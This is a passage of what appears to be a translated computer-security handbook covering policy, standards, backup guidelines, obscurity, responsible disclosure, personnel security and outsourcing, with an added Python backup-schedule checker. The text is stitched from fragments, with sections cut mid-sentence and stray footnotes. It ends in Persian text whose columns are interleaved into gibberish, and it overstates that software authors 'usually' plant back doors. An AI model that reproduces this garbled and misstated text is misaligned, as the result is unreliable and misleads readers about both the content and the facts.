Because of the inherent problems of the risk-assessment method, another approach to computer security has emerged in recent years, known as best practices [76] or due care [77]. This approach consists of a set of recommendations, procedures and policies that are generally accepted within the community of security researchers, bring organizations to an acceptable level of general security, and reduce risks at a reasonable cost. You can think of best practices as "the self-evident basics of sensibly implementing security measures".

Using best practices has its own problems. The biggest problem is that there is no single set of best practices that suits every environment and every user. The best practices for a website that handles financial information may resemble those for the website of a community newsletter; but the website holding financial information will most probably need additional security measures.

Following best practices cannot guarantee that your system will not run into a security problem. Under most best practices, the organization's security department must monitor the Internet for news of new attacks and download the patches released by software vendors. But even if you follow this regime, attackers may still use new, unknown and unpublished techniques to take over your computer system. And if you are poorly informed about the latest news, or the person responsible for monitoring the mailing lists is away on a trip, the attacker will get ahead of you.

The idea that tens of thousands of organizations can or should implement the existing best practices for the security of their computers is problematic, because the existing best practices are not suitable and cost-effective for every organization.

Many organizations that claim to follow best practices in fact apply minimum standards to the security of their machines; and in practice the best practices, or in other words the optimal solutions, are not really optimal themselves!

Our recommendation is a combination of the two approaches, risk assessment and best practices. Starting from the body of a set of best practices, an informed designer should assess the risks and offer a reasonable solution for each particular state of the system. For example, servers should be placed on separate machines and configured with an operating system and software on which the minimum of security capabilities is enabled. Operators must be aware of changes, keep up to date with patches, and expect the unexpected. Doing all this properly requires a deep understanding of how the system works and of the reasons why it fails. This is the approach followed in the later parts of this book.
draw up specific ones, such as an e-mail policy, personnel policies, and a user-account information policy.

The third approach, which many companies have adopted and which can be applied by companies of every size, is to have simple, concise policies, standards and guidelines that have been improved with best practices. Below we describe this last approach briefly; further resources on the subject are listed in the references section.

Policy plays three major roles. First, it makes clear what is being protected and why; second, it specifies who is responsible for providing that protection; and third, it provides a basis for interpreting and resolving any conflicts that may arise in the future. What a policy should not contain is a list of threats, machines and individuals (by name). A policy should be general and should change only rarely over time.

Standards

Standards are used to set out successful security practices in an organization, and their wording usually uses the verb "must". Standards are generally written independently of particular technical platforms, and they provide at least one criterion for determining whether they have been met. Standards come into being to support policy, and they change slowly over time. Standards may cover matters such as how new staff are to be hired, how long backup copies are to be kept, and how UPS systems are to be tested.

As an example, consider a standard for backups. It might read as follows:

Backups must be made of all Internet data and software, on a regular schedule. In no case may the routine backup operation be carried out less often than once every seventy-two hours. All backups must be kept for a period of at least six months; and the first backup of January and June of each year must be kept forever in a secure place outside the organization. A complete backup of the entire system must be made at least every other week. All backup media must meet accepted industry standards for their type, so that the information on them can still be recovered after at least five years in an unattended warehouse.

This standard does not name any particular backup mechanism or software package; but it does state clearly what must be stored, for how long it must be stored, and how often this must be done.

Consider a reasonable standard for authentication:

On a multi-user computer, every user account must have only one authorized user. That user must prove his or her identity to the system by means of a confirming token. Proof of identity to the computer can be provided by an authentication token [78], a smart card [79], a one-time password, or an approved biometric measure [80]. On no computer that has ever been connected to a network, can be carried outside the company, or has been used outside a private office may reusable passwords be used as the primary authentication mechanism.

Guidelines

Guidelines are documents that usually use the verb "should". The purpose of guidelines is to interpret the standards for a particular environment, whether a software environment or a physical one. Unlike standards, guidelines change whenever necessary. As their name suggests, these components of policy are not normally used as performance standards, but rather as ways of helping to get the job done.

A sample guideline for backups is given below:

[78] Authentication Token
[79] Smart Card
[80] Biometric
Backups on Unix-based machines should be made with the "dump" program. Backups of systems that are not in use 24 hours a day should be made during the night, in single-user mode. Backups of systems that run around the clock should be made at the shift change closest to midnight (when the load on the system is at its lowest). All backup copies should be read back immediately after they are written, to verify that the data written is correct.

A level zero [81] backup is made at the first backup of January and June. A level 3 backup should be made on the first and fifteenth of every month. A level 5 backup should be made every Monday and Thursday night, unless a level zero or level 3 backup has been made on the same day. A level 7 backup should be made every other night, except on holidays.

Every week the system administrator picks a file at random from a backup made during that week, and the backup operator restores that file from the backups in order to confirm that the backup procedures are working properly.

Guidelines are written for particular architectures and specific machines, and they change at shorter intervals than standards so that they can properly reflect changing conditions.

Key Points in Writing an Effective Policy

The role of policy (and of the related standards and guidelines) is to help protect the things that, taken as a whole, you regard as important. In most cases the policy does not need to be specialized or complicated. Sometimes one simple rule is enough for the whole policy of your environment, as in the following example:

The use and protection of this system is everyone's duty. Do only those things that you would want others to do as well. Respect the privacy of other users. If you come across a problem, try to fix it yourself or report it promptly. Respect the rules that govern the use of the system. Accept responsibility for what you do, and always identify yourself. Enjoy your work.

Sometimes you also need to use a more formal policy, one that has been reviewed by an official specialist and several security consultants, to protect your assets. Every organization's policy differs from that of every other organization, because each organization always has particular considerations that need to be addressed separately in the policies it draws up.

Assign an Owner

Every piece of information and equipment that has to be protected must have a designated owner. The "owner" is the person responsible for copying, destruction, backup and the other aspects of protecting the information. The owner is also one of the people authorized to have access to the information.

The security problem in many organizations is that there is important information with no clear owner. As a result, users do not know who decides how the information is stored or who draws up the rules for access to it. Sometimes information (and equipment too) disappears for a long time without anyone noticing, because no one is responsible for it and keeping track of the situation.

Be Positive

People respond better to positive, affirmative statements than to negative statements and prohibitions. Instead of drawing up long lists of "do not do this" statements, see how you can phrase the same rules positively. The brief policy given above could be written as a set of "don'ts", as follows; but notice how much more easily those same

[81] Level 0 dump
earlier statements read:

It is your duty not to allow the system to be misused. Do not do things that you would not want others to do. Do not violate the privacy of others. If you find a problem and cannot fix it, do not keep the problem hidden. Do not break the rules that govern the use of the system. Do not try to shift responsibility for your actions onto others; and do not conceal your identity either. We hope you do not have a bad time!

When you write policies, always keep the behavior of users in mind. They make mistakes and misinterpret points. Your policy should not be such that, when users make a mistake, it treats them as deserving any punishment whatever.

Beyond this, bear in mind that information systems may contain data about users, and users may want to keep that information private to some degree. This private information can include e-mail, personal records and job evaluations. This information must therefore also be protected, although you may not be able to guarantee that it remains private. In short, do not overlook the needs and feelings of users.

Concentrate on Education and Awareness

You can include the standards in the training and retraining program for all users. Every user should have basic security awareness, and that material should then be repeated for the user according to a set schedule and format (even if the refresher program consists of nothing more than handing staff a copy of this book!). Trained users are less likely to fall for tricks, and in particular for social-engineering attacks. In addition, if users know why each security measure has been adopted, they are more likely to be content with the measures and to carry each of them out correctly.

A vital part of any security system is giving staff the time and support for further education and training. There are always new tools, new threats, new methods and new information to learn. If staff spend 60 hours a week hunting imaginary viruses on personal computers and making backups, they will still not be as effective as staff who receive only a few weeks of training each year. Moreover, if they are given the chance to advance and learn on the job, and are allowed to spend their evenings and weekends with their families rather than installing software and making backups, they will be happier and more satisfied with their work.

Distribute authority in proportion to responsibility. One principle of security administration says:

If you have a responsibility for security but have not been given the authority to make rules and punish offenders, then when a major problem occurs you are the one who is blamed.

Although this principle holds in most cases, the real responsibility lies with whoever failed to distribute authority in proportion to responsibility.

This section contains checklists for the managers and staff who are responsible for security. In this section we deal with the important elements of any organization's security plan, including communication, awareness, training, and adequate funding to support the plan.

Make Sure You Know Your Security Perimeter

When you draw up your policy, you must make sure that you know the various kinds of systems, networks, staff and storage media within your security perimeter and that you have taken all of them into account. This knowledge defines what you need to be concerned about. When you draw up policies, you must make sure that you have not left out anything that is in your environment, or that can enter your environment and interact with your information resources.

In years past, many organizations defined their IT security perimeter by the same boundaries that were formed by walls and fences; but today organizational environments
are rarely so static.

When drawing up your policies, you should consider points such as the following:

• When you are away from your physical location, you can use portable computers and PDAs to access information. These devices can store sensitive information such as IP addresses, telephone numbers and passwords. These systems must have a minimum level of security, for example through encryption, or at the very least markings for physical security. Users must be made aware of, and trained in, the dangers of theft and eavesdropping.

take it off the premises, by what means that information should be protected (which includes encryption), and what steps should be taken if the medium is stolen or lost. It must also be set out in detail how media that have already been used are to be destroyed, so as to reduce the risks arising from disclosure of the information on them.

Try also to have suitable answers to the following questions:

• Which policies deal with people who bring their PDAs and laptops to the workplace for meetings, or simply on visits? The rules for connecting them to the networks, telephone lines, printers and other equipment of the site
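The backup guideline quoted earlier assigns a dump level to each night, and the backup standard it supports gives an auditor a measurable criterion: no more than seventy-two hours between routine backups. The Python code below is an added example, not part of the handbook; it assumes that "every other night" means every remaining night, that only level 7 runs are skipped on holidays, and that backup nights are 24 hours apart. The function names, the 2025 calendar and the holiday dates are constructed for illustration.

```python
from datetime import date, timedelta

LEVEL0_MONTHS = (1, 6)   # January and June, as the guideline is worded here
MAX_GAP_HOURS = 72       # criterion taken from the backup standard


def build_schedule(start, end, holidays=()):
    """Map every night from start to end (inclusive) to a dump level or None."""
    holidays = set(holidays)
    months_with_backup = set()
    schedule = {}
    day = start
    while day <= end:
        month_key = (day.year, day.month)
        if day.day in (1, 15):
            level = 3
        elif day.weekday() in (0, 3):      # Monday or Thursday night
            level = 5                      # not reached if level 3 ran today
        elif day not in holidays:
            level = 7
        else:
            level = None                   # holiday: the level 7 run is skipped
        # The first backup made in January or June is promoted to level 0.
        if (level is not None and day.month in LEVEL0_MONTHS
                and month_key not in months_with_backup):
            level = 0
        if level is not None:
            months_with_backup.add(month_key)
        schedule[day] = level
        day += timedelta(days=1)
    return schedule


def gap_violations(schedule, max_gap_hours=MAX_GAP_HOURS):
    """Return (previous_night, next_night, hours) for each gap above the limit."""
    nights = sorted(d for d, level in schedule.items() if level is not None)
    found = []
    for prev, nxt in zip(nights, nights[1:]):
        hours = (nxt - prev).days * 24
        if hours > max_gap_hours:
            found.append((prev, nxt, hours))
    return found


# Constructed holiday calendar for 2025 (illustration only).
SAMPLE_HOLIDAYS = [
    date(2025, 3, 8), date(2025, 3, 9),                       # Saturday, Sunday
    date(2025, 4, 18), date(2025, 4, 19), date(2025, 4, 20),  # Friday to Sunday
]

if __name__ == "__main__":
    plan = build_schedule(date(2025, 1, 1), date(2025, 12, 31), SAMPLE_HOLIDAYS)
    for prev, nxt, hours in gap_violations(plan):
        print(f"no backup between {prev} and {nxt}: "
              f"{hours} h exceeds {MAX_GAP_HOURS} h")
```

Under these assumptions a two-day holiday weekend stays within the standard, while a three-day holiday running Friday to Sunday leaves 96 hours between the Thursday and Monday runs, so the guideline alone does not guarantee that the standard is met.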
Thinking about all these issues before any problem arises helps to keep the problem from occurring. Putting meaningful statements into the security policy helps everyone to understand the concerns and to apply the right preventive mechanisms.

Adopt a Basic Approach to Security Issues

First decide which of the following models you want to follow: "whatever has not been explicitly prohibited is permitted" or "whatever has not been explicitly permitted is prohibited". Then decide how you want to define everything else. The first may suit a fairly open environment, such as a university, whereas the second is better suited to a commercial establishment, such as a bank.

Defense in Depth

When you plan your policy and your countermeasures, do not stop at a single layer; build several overlapping and independent levels of protection to defend against the various threats. Then add monitoring and auditing to the set, to make sure that the policies you have adopted really do work in practice. An attacker is far more likely to get past a single set of defenses than past, say, three stages of defense plus an alarm system. [82]

Enforcement and Security Audits

Drawing up a policy is not enough on its own; it must be checked regularly whether the adopted policy is being applied properly and, if it is, whether it is adequate and correct. The word "audit" [83] has taken on new connotations, and is currently used at least in the senses of financial audit, audit trail (using log files), security review of a system, and policy compliance review.

A policy compliance audit [84] consists of the steps taken to establish whether the standards set out in the policy are being observed, and if not, why not. Standards usually also supply the criteria and methods by which they are to be measured, which an auditor can use to gauge whether or not a standard is being observed. If the standards have not been observed, this can be the result of any combination of the following:

• personnel shortcomings;
• insufficient training and lack of the necessary skills;
• overwork;
• deficient facilities;
• lack of the necessary motivation;
• shortage of equipment;
• insufficient or unsuitable resources;
• inadequate maintenance and support;
• excessive use or load;
• organizational shortcomings;
• lack of responsibility;
• overlapping responsibilities;
• an unclear, uncoordinated and confusing division of work;
• policy shortcomings;
• unforeseen risks;
• incomplete or missing policies;
• conflicting policies; and
• a mismatch between policy and environment.

The key point about the list above is that problems with policy cannot be put down to the errors of users or administrators. Even insufficient training or excessive overtime is generally not under the administrators' control. A compliance audit should therefore not be seen as an unwelcome process; rather, it should be regarded as a collective effort to identify problems, find and reallocate resources, refine policies and standards, and raise awareness of security needs. Like all the

[82] See the following source by Tom Kellermann: "The 12 Layer Matrix: Building a Cyber-Fortress (2003)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Tools
[83] Audit
[84] Compliance Audit Policy
other parts of security, here too a team approach is the most effective approach in the overwhelming majority of cases. If the matter is managed properly, staff can achieve the desired level of security. The key is for us to help them do their jobs, not to place ourselves on the other side of the table, facing them.

The Problems with Security Through Obscurity

In traditional security mechanisms, which derived largely from military intelligence organizations, there was a concept known as "need to know". Information was compartmentalized, and each person was given only as much of it as was needed to carry out his or her duties. In environments where particular pieces of information are sensitive, or where inference security [85] must be maintained, this policy has a particular significance. If three pieces of information together can produce a damaging result, but no one has access to more than two of those pieces, then security can be said to be assured.

In a computer operations environment, applying the concept of "need to know" is usually inappropriate. This is particularly true when you have based your security on some technical matter being unknown to attackers. Relying on the ignorance of attackers can undermine your security.

Consider an environment in which management decides to keep the manuals out of the reach of users, so that they cannot learn about commands and options that might be used to harm the system. Under such conditions managers may believe that they have increased their security, but in reality this is not so. A determined attacker can find these documents elsewhere, through other users or other offices. Large quantities of these documents are available closer to any office than the nearest bookstore! Management cannot close off every avenue for learning about the system. What is more, because local users cannot see the documentation and learn about more effective options, they may get very little benefit out of the machines. Their motivation may also be weakened, because the implicit message management sends by doing this is "we do not fully trust you to be a responsible user". Beyond that, under such conditions, if someone does misuse the commands and features of the system, management may not be capable of recognizing and combating the problem; and if something happens to the one or two users who were authorized to access the documentation, there is no one left with the experience or knowledge needed to help when problems arise.

Keeping flaws or features secret in order to protect against them is also a weak security approach. Software authors usually place a back door in their programs that allows them to obtain access privileges without supplying a password. Sometimes, too, system flaws with profound security consequences are left in place because the manager imagines that no one knows about them. The trouble with these approaches is that the flaws and features present in a program are very likely to be discovered, either by accident or by a determined intruder. Keeping flaws and features hidden means that they go unobserved and, naturally, remain uncorrected. Then, once they are discovered, the existence of the flaw leaves every similar system vulnerable to attack by the people who discovered it.

The value of keeping algorithms secret, for example a proprietary encryption algorithm, is also debatable. Unless you are a cryptography expert [86], you cannot judge the strength of the algorithm. The result may be a mechanism with serious defects. An algorithm that is kept secret is naturally not examined by others, and so anyone who finds a flaw in it will be able to gain access to your data without your knowledge.

Similarly, keeping the source code of the operating system or of application programs secret provides no guarantee of security either. People who have made up their minds to get into your system find security holes every so often, whether or not they have the source code. [87] Without access to the source code, however, users cannot examine it systematically to find its problems; and so, although keeping the source code hidden may yield a small advantage, security must not depend on that secrecy.

One's attitude to security is the key point. If secrecy is breached, all the defensive measures founded on concealment lose their value. Worse still, continued secrecy prevents or restricts review and oversight of the program, and it may never be possible to find out whether the secrecy has been breached or not. Greater security can be achieved with algorithms and mechanisms that are inherently strong, even if the attacker knows about them. The very fact that you use strong mechanisms that everyone knows about may discourage an attacker and lead him to look for the thrill of a break-in somewhere other than on your systems. If you hide your money in a locked drawer, it is safer than when nobody knows that you keep your money in a mayonnaise jar in the refrigerator!

Responsible Disclosure

The point of the objection raised against "security through obscurity" is not to say that you should make security holes widely known to the public as soon as you find them. There are major differences between secrecy and prudence. If you discover a security hole in distributed or widely used software, you should quietly, and as quickly as possible, report it to the developer of that software. We also recommend that you bring it to the attention of one of the FIRST organizations (which are described in Appendix 4). These organizations can help developers prepare patches for the security holes that have been discovered, and make sure that the patches have been distributed and are being used properly.

If you broadcast a security hole in a piece of software far and wide, you create trouble for everyone who uses that software and cannot fix its flaws. In the Unix environment, many users have become accustomed to making changes to a program's source code in order to fix its flaws.

Unfortunately, not everyone has that ability, and many consumers have to wait weeks or months for the vendor concerned to release updated software. Some offices may not even be able to upgrade their software, either because they do nothing with the computer other than switch it on and work with the software they need, or because their software has been certified on the basis of its existing settings and they therefore cannot change its configuration. Some systems may be administered by people who do not have the skills needed to apply patches, and other systems may not be in active use or may lie outside the scope of the organization's support. Always act responsibly. It is better for us to distribute a patch among staff with no explanation of the underlying vulnerability than to hand attackers details of how to break into unpatched systems.

We have seen many cases in which an expert reported an important security flaw on a very public mailing list. Although that person's aim was to obtain a quick fix from the vendors, the outcome was a wave of attacks on systems whose administrators did not have access to the contents of that mailing list or were unable to apply the fix that was provided.

If no patch yet exists for the latest vulnerabilities of your system, sending their details to a mailing list will not only put many other sites at risk,

[87] Unless you develop every part of a piece of software yourself, on your own workstation, various people may have gained access to the source code, and there is a possibility that the source code will be disclosed, accidentally or deliberately.
[88] Although we have not yet seen such a case occur, a number of lawyers have told us that they expect their clients to ask them to do such a thing.
… Barings[90], Singapore branch, and Toshihide Iguchi[91] of the New York office of Daiwa Bank[92] both made high-risk investments that led to the loss of considerable amounts of their banks' capital. Instead of admitting failure, however, they tampered with the computerized account records and, by doing so, in effect put still more money into the gamble to make up for their earlier losses. In the end both were discovered after each had cost his bank more than one billion dollars. As a result of these actions Barings Bank was forced to declare bankruptcy, and Daiwa Bank permanently lost its license to do business in the United States.

… had been violated, no practical action was taken against him, and on the last day of Clinton's presidency he was pardoned by him.

If you examine these cases and the other computer-related offenses and violations of the past few decades, you will see one feature common to all of them: every one was carried out by people. The break-ins were the work of people; the computer viruses were written by people; and the passwords were stolen by people.

"Personnel security" covers everything that relates to staff: hiring, training, monitoring of conduct and, at times, dismissal. Statistics show that the most significant group of perpetrators of serious computer crime are people who either have legitimate access to the data or had it in the recent past. Some studies indicate that more than 80% of incidents are caused by such people. An important part of a good security plan is therefore the management of staff who hold classified access.

People contribute to computer security problems in two ways. Some, by failing to follow security procedures, forgetting security considerations, and not knowing the consequences of what they do, contribute to security incidents unintentionally. Others knowingly violate controls and procedures in order to help bring an incident about or to cause it single-handedly. As we noted earlier, in most cases the people who knowingly play a part in your security problems are your own employees (or were until recently): people who know the controls and know what information, of what value, is likely to be found where.

In the time you spend administering, say, a Unix system you may well meet people from both groups. The controls and mechanisms of personnel security are many and varied, and discussing them all would take a whole book; we therefore give only a summary of the most important ones. Drawing up a personnel policy cannot prevent security breaches, but it does reduce the security threats your company faces from its own employees.

Security in the hiring process

Background checks
When you hire new staff, check their backgrounds. You may have asked applicants to fill in application forms, but what then? At the very least, check every reference an applicant has given, so that you can learn about the applicant's past, including the reasons for leaving previous jobs. When reviewing the record, remember to scrutinize the dates on which previous jobs started and ended, and the gaps between them. You should also verify every certificate and academic degree, because it has happened many times that people have claimed degrees from reputable universities when those universities held no record showing that they had completed even a single course! Some people may also present credentials from universities that are barely bigger than a post office! Bear in mind that someone who resorts to lying in order to get a job cannot be used in sensitive positions.

Intensive investigations
In some cases you may want to look more seriously into applicants' character and background. Depending on the level of the position the applicant is to fill and the access the applicant will have to sensitive systems and data, you may want to:
• use a specialist investigation organization to check people's backgrounds;
• ask applicants for a certificate of no criminal record;
• check applicants' credit records to see whether they have run up large personal debts that they could not manage. If you find something, discuss it with the applicant. People who are in debt should not be barred from working, because then they would never be able to repay what they owe. It should not be overlooked, though, that staff under financial pressure are more likely to behave improperly;
• consider giving the applicant a lie-detector test (if the law allows you to). Lie-detector tests are not always accurate, but they can be useful if you have a sensitive position in mind for the applicant;
• ask the applicant to provide a bond for the job in question.

In general, carrying out all of these steps is not recommended for every hire. For staff who are to work in posts that require a high level of trust and whose holders are given special access, such as the hiring or dismissal of staff, further checks should be made. We suggest telling the applicant that you intend to carry out such checks and obtaining the applicant's consent. This is not essential, but it makes the checks easier and shows the applicant that you are careful and serious about the hiring. In some cases you need the applicant's explicit permission to carry out these investigations.

Periodic rechecks
Once you have completed your checks and hired the applicant, some of the checks should be repeated periodically. Compare the results of the current and previous checks to spot what has changed. Some changes may call for deeper investigation. For example, if you have an employee who is responsible for your accounting system, including the preparation of computer-generated checks for creditors, you may need to review the credit in that person's bank accounts at short intervals. If your recheck is carried out once every two years and you find that an employee's behavior falls outside the set criteria, you will normally decide to investigate that case further.

Initial training
Your security concerns about an employee should not end once the employee is hired. Every computer user must receive basic training in the security policies. At a minimum this training should cover proper procedures for choosing and using passwords, physical access to computers and networks (who is allowed to connect to the equipment, and how), procedures for making and keeping backups, policies on dialing in to the company's computers (by telephone), and policies on disclosing information over the telephone. Executives should not be exempted from any of this because of their position: they are at least as prone as other staff, if not more so, to choosing weak passwords and making other mistakes. They too must show their commitment to security, because security awareness in an organization flows from the top down and not the other way round.

Training should include written documents and a copy of the computer-use policies, and should cover topics such as proper and improper use of computers and networks, personal use of computer equipment (during and after working hours), policies on the ownership and use of e-mail, and policies on bringing software and data in and taking them out. The penalties for breaking the rules should also be explained during training.

All users should sign forms stating that they are aware of this information and accept its restrictions. These forms should be kept for years, so that if the question later arises whether the employee was told in advance what the organization is entitled to do in respect of that employee, documentary proof can be produced.

Ongoing training and awareness
Users need to receive fresh information about security and the proper use of computers at regular intervals. This retraining gives users a good opportunity to be reminded of current threats and their consequences, and creates a forum for exchanging views and raising concerns.

Staff should be given proper opportunities for current and future training, for example encouragement to attend professional conferences and seminars, subscriptions to professional and trade periodicals, and access to reference books and other learning materials. Staff should be given enough time to use the books, and the incentives they need to learn the required skills.

Alongside periodic training you may want to use a wider variety of methods to keep this process going: for example putting up posters or notices about best practices, announcing daily and weekly slogans, naming one day "Security Day", or holding meetings and seminars so that the importance of security does not fade from general view.

The size and nature of the organization, the level of threats and potential losses, and the number and behavior of staff are all factors that must be taken into account when plans are drawn up. The cost of awareness activities should also be anticipated in advance and included in the organization's budget.

Performance review and monitoring
Your employees' performance should be reviewed periodically. In particular, staff should receive credit and reward for professional growth and successful work. At the same time, problems should be identified and resolved constructively. You should encourage your staff to increase their abilities and deepen their understanding.

You should also prevent situations in which staff develop destructive feelings such as exhaustion from overwork, being disrespected, or being ignored. An office environment of that kind may lead staff to stop caring about the organization's interests. Staff may also leave your organization for better job opportunities or, worse, take part in disruptive activity against you out of revenge. Overtime should be an exception and not the routine, and all staff, especially those in sensitive posts, should be given enough vacation and free time. Overtime tires staff badly, and fatigue raises their error rate, makes them miss or overlook problems, and harms them emotionally. Their private lives will then come under strain as well, because their families and loved ones also want to see them now and then during the day. Staff who are under too much pressure and are tired are more likely to become disgruntled, and obviously that does nothing to improve security.

In general, signs of heavy stress, personal difficulties, and other kinds of problems in staff who hold relatively high access privileges should be watched for. Recognizing these problems and, where possible, helping to resolve them is the least that humanity requires. Doing so is also a way of protecting the organization's valuable resources: the staff themselves and the resources they have access to.

Auditing access
Make sure that access to equipment and information can be audited. In addition, make sure that everyone who has any kind of access knows that these audits exist. Much computer misuse happens because the perpetrator feels that nobody will notice what he is doing. If a criminal knows that his activities are being recorded, he may give up his destructive acts. Auditing does not mean only the review of computer logs; records of people entering and leaving the building, records of the use of electronic locks, and closed-circuit television tapes can all be audited to lay the ground for greater accountability.

All the same, you must also watch for the effects of covert controls. People are unhappy when they are not trusted and are watched in secret, and if they find out that they are under observation they may become angry and even behave in extreme ways. In some courts, for example, labor law and employment contracts have been seen to expose the employer to heavy civil lawsuits.

If monitoring is very close, merely telling staff that they are being watched is not enough. Some studies have shown that staff under intense monitoring are less productive and behave worse. This is entirely true if, for example, you want to monitor the length of staff telephone calls, every web site they visit, or how often they take a break. The best policies are those drawn up with the agreement and cooperation of the staff, with human resources staff (if you have such a department) present while the policy is written.
Least privilege and separation of duties
Pay careful attention to the principles of least privilege and separation of duties. These principles have proven their worth over time and should be used wherever they can be applied to your operations.

Least privilege
This principle says that each person should be given the minimum access needed to do the job. This restricted access covers both logical access (access to user accounts, networks, programs) and physical access (access to computers, backup tapes, and other peripheral equipment). If every user has an account on every system and physical access to every resource, then all users are, in terms of the level of threat, roughly …

… its customs accounting and order import system. The system was written in a programming language that was not easy to read, and the company that had produced it went out of business shortly afterwards. Only two people in the company knew how the system worked: the manager of management information systems (MIS)[98] and her programmer. These two people were responsible for making changes to the accounting system's programs, preparing the annual reports, repairing broken computer equipment, and even making the backups (which were stored off the company's premises, in the MIS manager's office).

What would have happened if the MIS manager and her programmer had one day been in a fatal road accident? What would have happened if the MIS manager had been offered a better job at several times the salary? If the programmer, because of the company's need for …
… voice mailboxes; or it may mean cutting off access to all of these systems.

In some environments these actions can have wide-ranging effects. At a university, for example, graduates may be allowed to go on using their user accounts for months or years after graduation (for example, to stay in touch with their professors). In offices too, if an employee is traveling or is absent through illness (for a few days, of course), the employee's accounts should not be blocked and the passwords should not be changed.

In many cases a departure is very sudden and unexpected. In these circumstances someone may come to the departing employee's workplace to make sure the locks are changed, and a security officer may go to escort the employee out, carrying a box with the personal belongings that were in the employee's desk drawer. The employee's user account has already been deleted, all the system passwords have been changed, and the telephones in the employee's office are no longer connected. This form of separation management[99] is very common in the financial services industry and is regarded as part of the organization's business. Staff in this sector are usually employees who were hired at will, under contracts which state that they may be subject to such measures. In all circumstances use your common sense. You must decide exactly what the access policy should be and state it clearly to staff and to the people responsible for implementing it.

Security considerations for other personnel
Other people who have access to your system may not always have your interests and concerns in mind, or may be indifferent to the harm that may be done to you. There are many reports of such incidents in family settings: children's playmates who have brought viruses into computer systems, or married people who have searched disks to gather evidence and find out about their spouses' infidelity. In business settings too there are reports of cleaners and temporary office staff who were caught while sabotaging or spying on company computers.

You cannot choose your parents, but you can influence who has the right to access your company's computers. Visitors, maintenance staff, contractors, vendors, and others may all have temporary or semi-permanent access to your office and your system. Consider how everything we have discussed so far can apply to these people. Finally, remember that nobody from outside the office should have unrestricted physical access to your computer and network equipment.

The people whose work records should be reviewed from time to time include:
• system operators and administrators;
• temporary staff and contractors who have access to the system;
• maintenance and cleaning personnel;
• security guards;
• messengers and supply personnel who have routine or unsupervised access to systems;
• consultants;
• accountants, auditors, and other finance personnel.

All staff who have access to the system should receive the necessary training in security and loss prevention, and the training material should be repeated for them periodically. Personnel should also be kept informed of the incident response procedures and of the penalties for breaching security rules.

Do not forget the threats that come from your own family. Whether you use one shared system at home for all members of the family or occasionally take your children to visit the office, it matters that they know the computer you work with is not something to play with. They must learn that sensitive devices and equipment …

[99] Separation Management
… In this chapter some of the advantages and disadvantages of outsourcing security are discussed, and a set of questions that must be answered before negotiations with new security partners are finalized is also raised.

Outsourcing: an alternative to the organization's unwanted entry into new areas
After reading all the material in the previous chapters you may have concluded that all your policies and plans are in good shape; or that there are still things you want to do; or you may be frightened by the sheer volume of the work. If you are in the last group, do not assume that the task is impossible for your company. There are other ways to draw up policies and plans and to provide security in your office: using resources, consultants, and contractors from outside the company. Even if you run a small one-person business from home, or a small company that depends on information and communication technology, you can benefit from shared specialist expertise: contracting with those security firms that are able to employ a trained and experienced team not tied to any one office, and to share its capabilities among the customers who ask for them and …

… possess, and some others perform poorly. Unfortunately the state of this field is such that the weakness of proposals prepared by novices cannot be recognized at a glance.

If, because your organization has no department dedicated to preparing security programs, you have not yet been able to draw up your policies and your disaster recovery and incident response plans, our advice is to get help with this from sources outside the organization. There are several international organizations that help developing countries in fields related to information technology. If such expertise is available, it can be very valuable both for short-term support and for building longer-term capabilities (training and awareness).

Developing an action plan
The first step is to determine which services you should use:

[100] Handing security over to resources outside the organization (Outsourcing)
[101] One of the results of the shortage of trained security specialists is the shortage of staff and resources to support information security education in training centers and universities. Governments and industry claim that this field is of great importance, but they have failed badly to allocate resources to help build it.
ﻛﺮﺩﻩﺍﻧـﺪ ،ﻳـﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ ﺩﺭ ﻣﻘـﺎﻻﺕ ﺧﺒـﺮﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻣﻄـﺎﻟﺒﻲ ﺁﻳــﺎ ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﺧــﻮﺩ ﻭ ﺑــﺎ
ﺧﻮﺍﻧﺪﻩﺍﻧﺪ ،ﻭ ﻳﺎ ﭘﺲ ﺍﺯ ﻳﻚ ﺗﻤﺎﺱ ﺳﺎﺩﺓ ﺗﻠﻔﻨﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻴﺪ؟
ﻭﺍﺳﻄﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻧﺎﻥ ﮔﺮﻓﺘﻪﺍﻧﺪ. ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﻓﻘﻂ ﺑﻪ ﻣﺸﺎﻭﺭﺍﻧﻲ ﻧﻴﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺛﺎﻟﺚ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺎﻳﮕـﺎﻫﻲ ﻗـﺮﺍﺭ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻓﺮﺍﻣﻮﺵ ﻧﺸﺪﻥ ﻳﻚ ﻣـﺴﺌﻠﻪ ﻣﻬـﻢ ،ﻋﻤﻠﻴـﺎﺕ
ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳـﻨﮕﻴﻨﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﻭﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ.
